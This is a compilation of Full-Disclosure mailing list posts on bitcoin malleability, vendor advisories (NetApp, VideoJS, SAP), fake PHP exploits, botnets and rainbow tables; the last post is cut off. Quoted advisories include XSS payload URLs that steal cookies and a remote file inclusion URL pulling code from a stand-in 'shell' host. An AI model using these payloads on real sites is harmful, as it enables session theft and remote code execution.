Re: [Full-disclosure] OT What is happening with bitcoins?

[Ron Scott-Adams]

Julius hit the nail on the head here. Transaction malleability is not some 
heretofore undiscovered bug in the Bitcoin implementation. It was a known 
entity long ago, and presumably with the creator(s) awareness. It really isn’t 
a problem itself; it’s perfectly mitigable with the correct implementations on 
the exchange’s side. It’s worth noting nearly all of the FUD surrounding BTC 
comes down to mistakes made with and among exchanges. Exchanges of any kind 
carry risk, and a new kind of exchange such as this is bound to have some 
serious question marks in the first many years of existence.

For more on transaction malleability and the technical considerations, see 
https://en.bitcoin.it/wiki/Transaction_Malleability, noting especially the 
following:
“...this does mean that, for instance, it is not safe to accept a chain of 
unconfirmed transactions under any circumstance because the later transactions 
will depend on the hashes of the previous transactions, and those hashes can be 
changed until they are confirmed in a block.”

The above is a huge note, and is made clear elsewhere as well. However, 
mistakes around this were still made, and continue to be made today. Live and 
learn, caveat emptor, etc.

On Mar 10, 2014, at 10:57 AM, Julius Kivimäki  wrote:

> Saying that the malleability thing is an issue with bitcoins is like saying 
> that sql injection is an issue with mysql.
> 
> 
> 2014-03-07 15:58 GMT+02:00 Meaux, Kirk :
> More to the point, has the transaction malleability issue been fixed that 
> caused Magic’s downfall?
> 
> Even though most exchanges just code around it, it’s still kind of a really 
> big issue if it isn’t fixed. :d
> 
>  
> 
>  
> 
> From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On 
> Behalf Of Pedro Worcel
> Sent: Thursday, March 06, 2014 6:09 PM
> To: Georgi Guninski
> Cc: full-disclosure
> Subject: Re: [Full-disclosure] OT What is happening with bitcoins?
> 
>  
> 
> Bitcoins are doing great actually. =)
> 
> Used to be worth 0 a few years back, useless, and now you can use them to buy 
> some stuff.
> 
> 
>  
> 
> 2014-03-07 4:06 GMT+13:00 Georgi Guninski :
> 
> Read on theregister that bitcoins are in trouble.
> 
> Allegedly mtgox lost $400M maybe related to
> transactions.
> 
> Are the bugs in bitcoin or just sufficiently
> many ones got rooted?
> 
> Is bitcoin still alive?
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 
> 
> --
> 
> GPG: http://is.gd/droope
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Unscribe

[Ron Yount]

Email address to be inactive.  Please unsubscribe.





-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On 
Behalf Of SEC Consult Vulnerability Lab
Sent: Tuesday, May 7, 2013 12:57 AM
To: bugtraq; full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] SEC Consult SA-20130507-0 :: Multiple 
vulnerabilities in NetApp OnCommand System Manager

SEC Consult Vulnerability Lab Security Advisory < 20130507-0 > 
===
  title: Multiple vulnerabilities
product: NetApp OnCommand System Manager  vulnerable version: <= 
2.1 and <=2.0.2
  fixed version: 2.2 (only XSS fixed)
CVE: CVE-2013-3320 (XSS)
 CVE-2013-3321 (File inclusion)
 CVE-2013-3322 (OS command execution)
 impact: medium
   homepage: http://www.netapp.com/
  found: 2012-11-06
 by: M. Heinzl
 SEC Consult Vulnerability Lab
 https://www.sec-consult.com/
===


Vendor description:
---

"You don't need to be a storage expert to manage NetApp storage systems.
Configuration and ongoing storage management are easy using the Web-based 
OnCommand® System Manager. System Manager is the simple yet powerful management 
solution for NetApp storage it'seasy for small to midsize businesses to use and 
efficient for large enterprises and service providers."

Source: 
http://www.netapp.com/us/products/management-software/system-manager.html


Vulnerability overview/description:
---

NetApp OnCommand System Manager suffers from multiple permanent and reflective 
cross-site scripting vulnerabilities, a local file inclusion vulnerability as 
well as an OS command execution vulnerability.

Malicious, authenticated users can exploit these flaws to change the contents 
of the displayed site, redirect the user to other sites, steal user 
credentials, execute system commands and read sensitive information.

The vendor will not fix the file inclusion and OS command execution issues, as 
it is considered a design feature. 



Proof of concepts:
-

1) Multiple Reflective Cross-Site Scripting Vulnerabilities (internal bug 
number 654355) - CVE-2013-3320

When configuring CIFS (Configuration > Protocols > CIFS > Configuration > 
Setup), JavaScript can be inserted into the parameters  and 
.

Request (domain-name):
POST /zapiServlet HTTP/1.1
Host: 127.0.0.1:1195

[...]

http://www.netapp.com/filer/admin";>workgroupmultiprotocolFILER


Furthermore, when creating new LUNs or editing already existing ones (Storage > 
LUNs > (Create or Edit)), JavaScript can be inserted into the parameter 
.


2) Multiple permanent cross-site scripting vulnerabilities (internal bug number 
654355) - CVE-2013-3320

When creating new users or editing already existing ones (Configuration > Local 
Users and Groups > Users > (Create or Edit)), JavaScript can be inserted into 
the parameters  and .

Request (full-name):
POST /zapiServlet HTTP/1.1
Host: 127.0.0.1:1457

[...]

http://www.netapp.com/filer/admin";>testtesttest42949672950Administrators


Furthermore, when creating new groups or editing already existing ones 
(Configuration > Local Users and Groups > Groups > (Create or Edit)), 
JavaScript can be inserted into the parameter .


When creating new shares or editing already existing ones (Storage > Shares > 
(Create or Edit)), JavaScript can be inserted into the parameter .


3) Local File Inclusion (internal bug number 654357) - CVE-2013-3321 * When 
retrieving log files through SnapMirror (Diagnostics > SnapMirror Log), the 
path can be changed to read arbitrary files from the file system.


4) OS Command Execution (internal bug number 654360) - CVE-2013-3322 *

When using the Halt/Reboot interface (Configuration > System Tools > 
Halt/Reboot), 
arbitrary OS commands can be injected.


* To exploit these issues, the attacker must be authenticated as root. The 
vendor will not fix these issues, as it is considered a design feature. Hence 
no proof of concept will be included within this advisory.


Vendor contact timeline:

2012-11-06: Contacting vendor through security-in...@netapp.com
2012-11-06: Initial vendor response
2012-11-07: Forwarding security advisory to vendor
2012-11-07: Vendor acknowledges that the advisory was received
2012-11-14: Asking vendor for a status update
2012-11-14: Vendor asks for more time to address the issues
2012-11-27: Asking vendor for a conference call to discuss further details
2012-11-28: Conference call scheduled for 12th of December
2012-12-12: Conference call 
2012-12-17: Requested feedback from the vendor
2013-02-07: Requested again for feedback/status update on reported
vulnerabilit

Re: [Full-disclosure] Vulnerabilities in VideoJS

[Ron Yount]

Please unsubscribe.  Address to be inactive

-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On 
Behalf Of MustLive
Sent: Monday, May 6, 2013 4:45 PM
To: submissi...@packetstormsecurity.org; full-disclosure@lists.grok.org.uk; 
1337 Exploit DataBase
Subject: [Full-disclosure] Vulnerabilities in VideoJS

Hello list!

I want to inform you about vulnerabilities in VideoJS. This is popular video 
and audio player, which is used at hundreds thousands of web sites and in 
multiple web applications.

This is Cross-Site Scripting vulnerability in VideoJS. There is also DoS hole 
related to this player, which I've found at 27.01.2013 at vine.co, which was 
using VideoJS Flash Component v3.0 (http://vine.co/v/b5HpgZT3ZwL).
Which concerned with Flash Player, Adobe fixed it already at 12th of February.

More information is in my advisory for DoS vulnerability in Adobe Flash Player 
(http://seclists.org/fulldisclosure/2013/Apr/9). Here is my video demonstration 
of BSOD in Adobe Flash in Mozilla Firefox with using VideoJS 
(http://www.youtube.com/watch?v=xi29KZ3LD80).

-
Affected products:
-

Vulnerable are versions before VideoJS Flash Component 3.0.2 and VideoJS 4.0. 
Versions VideoJS Flash Component 3.0.2 and VideoJS 4.0 are not vulnerable to 
mentioned XSS hole, except XSS via JS callbacks (as it can be read in 
repository on github). Also there are bypass methods which work in the last 
version, but the developers haven't fixed them due to their low impact. This 
week developers are planning to officially release VideoJS 4.0 (but swf-file 
with fixed XSS hole is already available at video.js and video-js-swf 
repositories on github).

Updated version of VideoJS.swf is available in the next repositories:

https://github.com/videojs/video-js-swf
https://github.com/MustLive/video-js-swf

-
Affected vendors:
-

Earlier Zencoder, now Brightcove
http://videojs.com

--
Details:
--

Cross-Site Scripting (WASC-08):

http://site/video-js.swf?readyFunction=alert(document.cookie)

But the fix in VideoJS Flash Component 3.0.2 is not protecting from the next
attacks:

http://site/video-js.swf?readyFunction=alert

http://site/video-js.swf?readyFunction=prompt

http://site/video-js.swf?readyFunction=confirm

Which are small ones and the developers don't worry about them, so after I've 
drawn their attention last week on incomplete fix, they still released such 
fix. But they will think about improving their protection in the future 
versions.


Timeline:
 

2013.01.27 - found DoS (BSOD) vulnerability.
2013.01.28 - recorded video PoC. And in the night have informed Adobe.
2013.02.07 - found XSS vulnerability.
2013.02.08 - informed developers of VideoJS about both vulnerabilities. They 
thanked and promised to fix it.
2013.02.12 - Adobe fixed DoS vulnerability.
2013.02.23 - reminded VideoJS developers and asked for date of releasing the 
fix.
2013.03.09 - again reminded developers.
2013.03.26 - again reminded developers.
2013.04.08 - reminded developers on github and resent previous letter to 
Zencoder's developers (since Brightcove, which acquired Zencoder, ignored the 
hole for two months).
2013.04.08-30 - discussed with developers (on github and by e-mail). And made 
my own fix to force developers to fix the hole.
2013.04.30 - developers fixed XSS hole in VideoJS Flash Component 3.0.2 in 
source code on github.
2013.05.02 - developers compiled fixed version of swf (after my reminding) and 
uploaded to both repositories.
2013.05.02 - tested version 3.0.2 and found that developers haven't fixed the 
hole completely and informed them.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [ESNC-2013-005] Remote Code Injection in SAP ERP Central Component - Project System

[Ron Yount]

Please unsubscribe.  Address to be inactive.

-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On 
Behalf Of ESNC Security
Sent: Monday, May 6, 2013 10:31 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] [ESNC-2013-005] Remote Code Injection in SAP ERP 
Central Component - Project System

[ESNC-2013-005] Remote Code Injection in SAP ERP Central Component - Project 
System

Please refer to http://www.esnc.de for the original security advisory, updates 
and additional information.


1. Business Impact


Project System, which is part of SAP ERP, provides tools to track project costs 
and resources. It is tightly integrated with Controlling, Human Resources, and 
Logistics modules.

This vulnerability allows execution of arbitrary program code of the user's 
choice.

According to SAP, the user can:

* "Inject and run their own code,

* Obtain additional information that should not be displayed,

* Modify data, delete data."

Since this issue exists on a remote function module, attacker can directly call 
the RFC from the network or from Internet via SOAP-RFC services.

Risk Level: High


2. Advisory Information


-- ESNC Security Advisory ID: ESNC-2013-005
-- CVE ID: CVE-2013-3244
-- Original security advisory:
http://www.esnc.de/sap-security-audit-and-scan-services/security-advisories/58-remote-code-injection-in-sap-erp-project-system
-- Vendor Patch Date: 11.12.2012
-- Public Advisory Date: 07.05.2013
-- Researcher: Ertunga Arsal


3. Vulnerability Information


-- Vendor: SAP
-- Affected Components: ERP Central Component PS-IS
-- Affected Versions: Please refer to SAP note for more information
-- Vulnerable Function: CJDB_FILL_MEMORY_FROM_PPB
-- Vulnerability Class: Remote Code Injection
-- CVSS v2 score by the vendor: 7.5 AV:N/AC:M/AU:S/C:P/I:P/A:C
-- Remotely Exploitable: Yes
-- Authentication Required: Yes
-- Additional Notes: An exploit for this vulnerability is available in ESNC 
Penetration Testing Suite


4. Solution


Please apply the security patch [SAP Note 1776695] supplied by the vendor.
More information can be found at vendor's site:

https://service.sap.com/sap/support/notes/1776695

To prevent this and similar flaws, enterprises can use ESNC Code Security for 
scanning their own ABAP code or for assessing the security of the ABAP programs 
installed on their SAP systems.


About ESNC


ESNC GmbH, Germany is a company specialized in SAP penetration testing, ABAP 
security review and SAP vulnerability assessment services.

It's flagship product ESNC Security Suite is used by many large enterprises for 
security scanning their SAP ABAP and Java AS systems, running ABAP code 
inspection, enforcing security compliance and for providing SAP security 
monitoring.

For more information about our products and services, please visit our web page 
at http://www.esnc.de

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] EC-Council's Sanjay Bavisi Hacking Series: Identifying Target IPs and Monitoring Google IPs

[Ron Goldstien]

Hello hackers, here is EC-Council's Sanjay "Jay" Bavisi's Hacking Series
video tutorial #1. Today, Jay shows you how to:

   1. Identify your network speed
   2. Find the IP addresses of your targets
   3. Use Tracer T to find who is looking at any website
   4. Use Tracer T to find who is viewing google at this moment
   5. Monitor other people's network speeds


As always friends, use this information for Certified Ethical Hacking (CEH)
and Certified Ethical Spamming (CES) purposes only. Without further ado:

http://www.youtube.com/watch?v=SXmv8quf_xM
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox 3.0.8 remote DoS: 0-day exploit

[Ron]

You're correct that time machines don't exist yet. However, this is 
proof that they'll be invented in the next five months.

Stay tuned!

Mike Bann wrote:
> I highly doubt you reported this to Mozilla in "September of 2009". I 
> don't think time machines like that exist yet, but i'd be pleased to be 
> wrong.
> 
> Berend-Jan Wever wrote:
>> ...sigh
>>
>> This is https://bugzilla.mozilla.org/show_bug.cgi?id=456727, which I 
>> reported to Mozilla in September of 2009. It is a NULL ptr DoS, there 
>> is no "exploit" in the sense of executing arbitrary code, just a 
>> "repro" that can trigger a crash. The repro provided by Carl is the 
>> exact same repro I provided to Mozilla.
>>
>> Incidentally, Carl has report this exact same bug 
>> before: http://seclists.org/fulldisclosure/2009/Jan/0219.html. This is 
>> how the repro got on milw0rm in the first place 
>> (http://milw0rm.com/exploits/8091). Aditya K Sood later submitted the 
>> repro (slightly modified) to milw0rm as his code as well 
>> (http://milw0rm.com/exploits/8219).
>>
>> Some say plagiarism is the sincerest form of flattery, so I guess I'll 
>> start obfuscating my repros into ASCII art that says "SkyLined" to 
>> prevent any more people from flattering me.
>>
>> Cheers,
>> Sky
>>
>>
>> Berend-Jan Wever > >
>> http://skypher.com/SkyLined
>>
>>
>>
>>
>> On Sat, Apr 4, 2009 at 2:39 PM, carl hardwick > > wrote:
>>
>> I found an unpatched vulnerability in the latest Firefox 3.0.8 allows
>> a remote attacker to cause a DoS.
>> A 0-day exploit is available here:
>> 
>> http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oPfkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8xnmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjws1umYfXMbeoe6wr8IrMRRv
>> 
>> 
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>> 
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BBC cybercrime probe backfires

[Ron]

Larry Seltzer wrote:
> If they paid for access to the botnet then there's no real moral
> difference.

I'm not sure if I agree with that, you'd have to convince me.

To me, there's a huge difference between growing/cooking drugs and
buying/using them. I think the same sense applies here.

I agree that supporting the bot-runners is a bad idea, but I don't think
that paying them for their bots puts them on equal footing.

(In my humble opinion, of course)

Ron

-- 
http://www.skullsecurity.org/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BBC cybercrime probe backfires

[Ron]

Ivan . wrote:
> The BBC hacked into 22,000 computers as part of an investigation into
> cybercrime but the move quickly backfired, with legal experts claiming
> the broadcaster broke the law and security gurus saying the experiment
> went too far.
> 
> http://www.smh.com.au/news/technology/security/bbc-cybercrime-probe-backfires/2009/03/13/1236447465056.html

They keep saying that the BBC "hacked" 22,000 computers, when in reality
the original articles said the BBC "acquired" or "hijacked" the botnet.
Strawman for the win?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CfP hack.lu 2008

[Ron Bidule]

For those of you that may be interested:


*Call for Papers Hack.lu 2008*

The purpose of the hack.lu convention is to give an open and free playground
where people can discuss the implication of new technologies in society.

hack.lu is a balanced mix convention where technical and non-technical
people can meet each others and share freely all kind of information.

The convention will be held in the Grand-Duchy of Luxembourg in October 2008
(22-24.10.2008).



Scope

==



Topics of interest include, but are not limited to :



* Software Engineering and Security
* Honeypots/Honeynets
* Spyware, Phishing and Botnets (Distributed attacks)
* Newly discovered vulnerabilities in software and hardware
* Electronic/Digital Privacy
* Wireless Network and Security
* Attacks on Information Systems and/or Digital Information Storage
* Electronic Voting
* Free Software and Security
* Assessment of Computer, Electronic Devices and Information Systems
* Standards for Information Security
* Legal and Social Aspect of Information Security
* Software Engineering and Security
* Security in Information Retrieval
* Network security
* Forensics and Anti-Forensics
* Mobile communications security and vulnerabilities


Deadlines

=



The following dates are important if you want to participate in the CfP



Abstract submission : no later than 1 July 2008
Full paper submission : no later than 1st August 2008
Notification date : around end of August



Submission guideline (for standard paper track)





Authors should submit a paper in English up to 5.000 words, using a
non-proprietary and open electronic format.

The program committee will review all papers and the author of each paper
will be notified of the result, by electronic means.

Abstract is up to 400 words. Submissions must be sent via the
http://www.hack.lu/ website.


Submissions should also include the following:



1. Presenter, and geographical location (country of origin/passport)and
contact info.
2. Employer and/or affiliations.
3. Brief biography, list of publications or papers.
4. Any significant presentation and/or educational experience/background.
5. Reason why this material is innovative or significant or an important
tutorial.
6. Optionally, any samples of prepared material or outlines ready.
7. Information about if yes or no the submission has already been presented
and where.



The information will be used only for the sole purpose of the
hack.luconvention including the information on the public website.

If you want to remain anonymous, you have the right to use a nickname.


(Accepted) Speakers' Privileges




* Accommodation will be provided (3 nights)
* Travel expenses will be covered
* Conference speakers night


Publication and rights

==



Authors keep the full rights on their publication/papers but give an
unrestricted right to redistribute their papers for the hack.lu convention
and its related electronic/paper publication.



Sponsoring

==



If you want to support the initiative and gain visibility by sponsoring,
please contact us by writing an e-mail to info(AT)hack.lu



Web site

==

http://www.hack.lu/

Barcamp and interactive session



During the conference, there is a continuous interactive session. You are
also very welcome to participate to submit small ideas, presentation or
poster. The review process is simplified and open to anyone willing to take
an active role during the conference. You can submit your proposal using the
same web interface for the barcamp but you don't require to submit a full
paper.

Submissions are done via the hack.lu website (http://www.hack.lu/)

Start here to submit a paper to this conference.
Step one of the submission
process





The hack.lu conference is organized by the ASBL CSRRT-LU (Computer Security
Research and Response Team Luxembourg)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] nucleus 3.22 >> RFI

[Ron Superior]

Hi folks,

  Some months back I seem to remember people hypothesizing as to the
real purpose behind some of these particularly lame fake PHP exploits.
 You know the ones I mean; they're mostly remote file includes, they
often are decorated with some simple ASCII art, and the "thanks" and
"greetz" sections are always loaded with names that suggest Turkish or
other Middle Eastern origin.

  The two most interesting suggestions that I recall were:

  1) Somebody wanted to pump up the lists with PHP exploits so they
could claim later that some large number X of PHP vulnerabilities had
been posted to FD since some date.

  2) Covert communication, or that the "exploits" were really secret
messages between t3rr0ri$ts or something.

  I'm sure there exists a motive beyond just spamming us to be
annoying.  Any one have any new ideas, or good arguments for either of
the above two ideas?

Ron

Guasconi Vincent wrote:
> On 5/6/07, security curmudgeon <[EMAIL PROTECTED]> wrote:
>> : VENDOR :http://nucleuscms.org/
>> : BY : s3rv3r_hack3r (hackerz.ir admin)
>> : bug:
>> : nucleus3.22/nucleus/plugins/skinfiles/index.php   =
include($DIR_LIBS . 'PLUGINADMIN.php');
>> : Exloit:
>> : http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
>>
>> I haven't examined the source code to this, but on June 16, 2006,
>> [EMAIL PROTECTED] disclosed RFI vulnerabilities [1] in four Nucleus
>> scripts, all with the DIR_LIBS variable as the injection point. This was
>> subsequently proven to be a false report as the variable was previously
>> set and could not be manipulated by an attacker.
>>
>> Have you actually tested this, or is this based on a quick grep of the
>> source code?
>
> They're like bots now.
> They didn't hear you, and you can't stop them.
>
> Try a spam rule.
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] rPSA-2007-0011-1 wget

[Ron DuFresne]

[SNIP]

>
> Description:
> Previous versions of the wget package can crash if they contact a
> malicious FTP server.  No further vulnerability is enabled by this
> minor flaw; system security is not threatened in any way.
>


Which might well be a good thing eh?  Afterall, if the site is malicious,
better the app die and dump then allow one to prceed to inflict harm upon
ones self?


Thanks,


Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CTF in a box?

[Ron Sweeney]

Can anbody tell me if there is a simple CTF ruleset that maybe has its
own accompanying distro that others can play?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel source archive vulnerable

[Ron]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

Hadmut Danisch wrote:
> Your assumption is false here. The kernel maintainers DO NOT say this:
> Read the README file, it does not contain any statement that you do
> not have to compile as root. They silently explain how to compile if
> you are not root, but they don't tell not to be root.


Sorry for being late, but I don't read full-disclosure often.  However,
I thought it prudent to cite this part of the Kernel README (this is
from the 2.6.10 kernel that I have installed, but I doubt it's changed):

- --
 - Do a "make" to create a compressed kernel image. It is also
   possible to do "make install" if you have lilo installed to suit the
   kernel makefiles, but you may want to check your particular lilo
   setup first.

   To do the actual install you have to be root, but none of the normal
   build should require that. Don't take the name of root in vain.
- --

Sounds like they recommend that to me?
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFFFqA2fqSf2EkP4p4RAlnLAJ0SgqwRzDgv+WN1i4cGK8CAQUG2AwCfXn7Y
r/5ScHzCgvUaK2fNQtRR4yI=
=QRP8
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Self-contained XSS Attacks (the new generation of XSS)

[Ron Jennings]

Hi Tim,
   You make a great point.  

    Ron Jennings,  NCIE SSP 
   Chaser Security- A Microsoft Partner
  Cell:559.360.2340 24hr.customer service
  VOIP:562.365.1295 


From: Tim <[EMAIL PROTECTED]>To: "pdp (architect)" <[EMAIL PROTECTED]>CC: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com,[EMAIL PROTECTED], [EMAIL PROTECTED]Subject: Re: [Full-disclosure] Self-contained XSS Attacks (the new generation of XSS)Date: Fri, 22 Sep 2006 10:03:11 -0400>>Hello pdp,>> > http://www.gnucitizen.org/blog/self-contained-xss-attacks> >> > XSS attacks can be persistent and non-persistent. Persistent XSS is> > more dangerous since it allow attackers to control exploited clients> > for longer. On the other hand non-persistent XSS is considered less> > dangerous although it has been widely used in many phishing attempts.> >> > In this article I will 
expose some of my findings around a new attack> > vector which is of type non-persistent XSS but a lot more dangerous> > than the persistent one.> >> > Some of you might be familiar with this attack vector; this subject> > has been covered very vaguely in the past and none of its full> > potentials has been explored. The impact of this attack is much bigger> > today and could affect many web applications.>>This is a very interesting vector. However, I would argue that it is>not a new class of XSS. Generally, the classes have been defined based>on where the injected data flows from, not how it is injected in the>page.>>For instance, stored or persistent XSS comes from an attacker via one>communication, gets saved on the server, and is later reproduced 
to>another user. Reflected is generally embedded in a link, sent to a>victim, which a victim then sends to the webserver and is reflected back>to achieve injection. DOM-based is similar, but does not need to flow>to the webserver before coming back to get injected. I personally label>these three classes Type 2, Type 1 and Type 0 respectively, in order to>reduce confusion about terminology [1].>>All three of these scenarios could be used with your injection vector.>A server side script could store the URL supplied by an attacker, and>later present it to a victim, thus making it persistent. Similarly, a>document.write() call could be exploited to inject a data: link, even if>the typical dangerous characters (', ", <, >, etc) were handled.>>Don't get me wrong... I really like the vector, 
and what you've brought>to the list. I just don't think it should be considered another class.>>cheers,>tim>>>1. http://en.wikipedia.org/wiki/XSS>>->Sponsored by: Watchfire>>Cross-Site Scripting (XSS) is one of the most common application-level>attacks that hackers use to sneak into web applications today. This>whitepaper will discuss how traditional CSS attacks are performed, how to>secure your site against these attacks and check if your site is protected.>Cross-Site Scripting Explained - Download this whitepaper today!>>https://www.watchfire.com/securearea/whitepapers.aspx?id=70150008Vmr>-->

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IE7 Zero Day

[Ron DuFresne]

On Fri, 5 May 2006 [EMAIL PROTECTED] wrote:

> On Fri, 05 May 2006 09:01:02 PDT, [EMAIL PROTECTED] said:
> > I do not support nor do I wish to participate in anything iDefense
> > does.  They are the original parasites of your industry.
>
> Actually, they're hardly the *original* parasites.  Others had
> that territory scoped out before they muscled in. :)
>

Yeah, but since he can't sploit this "vuln" he claims to have found, it's
perhaps not going to net him much interest nor cash from others, being
he's also holding his cards so close4 to his vest.


One might as well post it this way:

someplace, somewhere is a pc with a vulnerable application, guess where it
is and you can own it.  Oh, but, pay me big bucks first so I can eat well
for a day or two.


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Google Groups e-mail disclosure in plain text

[Ron Whitney]

> This is my last ever Full-Disclosure post...

...and there was much rejoicing.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] rainbowtables.schmoo.com dead?

[Ron]

Aha, the C killed me.  That's exactly why I should never trust my 
memory!  :)


Thanks for putting my mind at ease!

Ron

B Potter wrote:

"shmoo" has no "c".  that was the first problem :)

Also, we are right now in the process of migrating the tables to a new 
server.  Another 48 hours and you should be good to go.  Note that the 
tables are available via torrent so it doesn't kill the bandwidth nearly 
as bad as you would think.


later

bruce


On Apr 12, 2006, at 5:04 PM, Gridmark wrote:

Actually, its http://rainbowtables.shmoo.com, but it's currently down 
for maintenance.


As per Shmoo.com <http://Shmoo.com>:
"Some of our previous website content may be unavailable while we are 
performing updates."


-Gridmark

On 4/12/06, *Ron* <[EMAIL PROTECTED] 
<mailto:[EMAIL PROTECTED]>> wrote:


Hello,

I found myself in a situation today where I needed to crack a Windows
password.  I decided that, since I have enough room to store them
now,
I'd grab a table from http://rainbowtables.schmoo.com.  When I went
there, I discovered, my horror, that I was redirected to a search
engine
page.

Luckily, I managed to crack the passwords in a different way, they
were
like 5-characters alphabetic.  But the problem remains, I'd like
to get
a good rainbow table.

Does anybody know another site where rainbow tables can be downloaded
for free?  A quick Google search turned up nothing.  If nothing comes
up, perhaps I'll generate my own tables, but I'd rather not spend
months
doing it.

Thanks,
Ron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




--
You will patch your PC or so help me god I will napalm your children.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Shell accounts

[Ron DuFresne]

On Tue, 11 Apr 2006 [EMAIL PROTECTED] wrote:

> On Tue, 11 Apr 2006 23:48:41 BST, Ian stuart Turnbull said:
> > Ha Ha. Yes, not a proper fiend hey. But I take it that I would be anonymous
> > technically.
>
> Nope.
>
> Hint - if you send a packet *out* from the shell account, it's probably as a
> result of another packet going *in* to the shell account.
>
> Even the stupidest of cops can figure out that "wow - every time a packet
> heads out from here to the Pentagon, a split second before, a similar packet
> came in from some bozo on a cablemodem in Idaho.  Maybe the Idaho guys need
> to pay this guy a visit"
>
> Yes, you can obfuscate it with setting cron jobs and tunnelling data via 
> covert
> channels and other neat tricks, but the basic point remains - if you connect
